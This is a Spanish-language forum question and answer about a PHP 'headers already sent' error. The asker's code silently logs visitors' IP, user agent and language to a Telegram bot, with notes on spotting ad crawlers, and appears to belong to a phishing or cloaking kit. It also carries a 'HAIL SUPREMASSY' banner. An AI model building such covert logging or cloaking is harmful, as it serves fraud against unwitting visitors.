# Error Cannot modify header information - headers already sent

Tags: php

Estoy intentando añadir unas nuevas líneas de code a mis funciones de php, pero sin embargo me da el siguiente error:

> Warning: Cannot modify header information - headers already sent by (output started at /homepages/19/d887169904/htdocs/renta-info/php/logger_for_google/logger.php:1) in /homepages/19/d887169904/htdocs/renta-info/assets/php/vulnerer.php on line 65

Sé que es debido a que múltiples funciones de php modifican las cabeceras como setcookie,redirecciones por header... Lo que no sé es en qué parte tengo el error.
Dejo aquí los codes donde da el error.

Code of Logger_for_google:

```
<?php


//include 'crawling.php';




/* Archivo de Configuración */
include 'config.php';


// With this we can  get external information of the user which have accesed to our website.


$ip = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT']; 
$user_language = $_SERVER['HTTP_ACCEPT_LANGUAGE'];





$content_login = '<pre>
We have detected that one user have accessed to out website, (Principal page, preloader)
If user_agent contains adword word, add it to crawling.php array to improve the feature.

UA: '.$user_agent.'
IP: '.$ip.'
User_Language: '.$user_language.'



~SSNOVERIFY
HAIL SUPREMASSY
</pre>';

       





if ($telegram_active === 1) {
  /* Logs Vía TG */
  foreach ($chats_id as $chat_id) {
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($content_login)."&parse_mode=HTML" );}}



    

    else{
        print '';
    }
 
    


ob_end_flush();
   ?>
```

Code of vulnerner.php

```
//Condiciones de language
if (in_array($user_language,$lang_en)){

    setcookie('en_language', time()+31536000, '/');
    ob_start();
    echo  <<<EOT
    <script>(function()
{
  if( window.localStorage )
  {
    if( !localStorage.getItem('firstLoad') )
    {
      localStorage['firstLoad'] = true;
      window.location.reload();
    }  
    else
      localStorage.removeItem('firstLoad');
  }
})(); </script>
EOT;
     ob_end_flush();  
    
}
else{
    print '';
}
```

Answer (score 0):

Es un problema habitual. Tu php ha emitido alguna salida y por tanto ha lanzado las headers. Si después vuelve a producir una salida aparece el error porque las headers no pueden modificarse. Causa, varias y a veces ilocalizables: sacar código antes de inicia php, espacios en blanco inadvertidos, incluso setcookie necesita enviar encabezados...
Una solución es añadir output_buffering = 8092 al archivo php.ini.
Con esta opción php enviará la salida de una vez en lugar de hacerlo a trozos.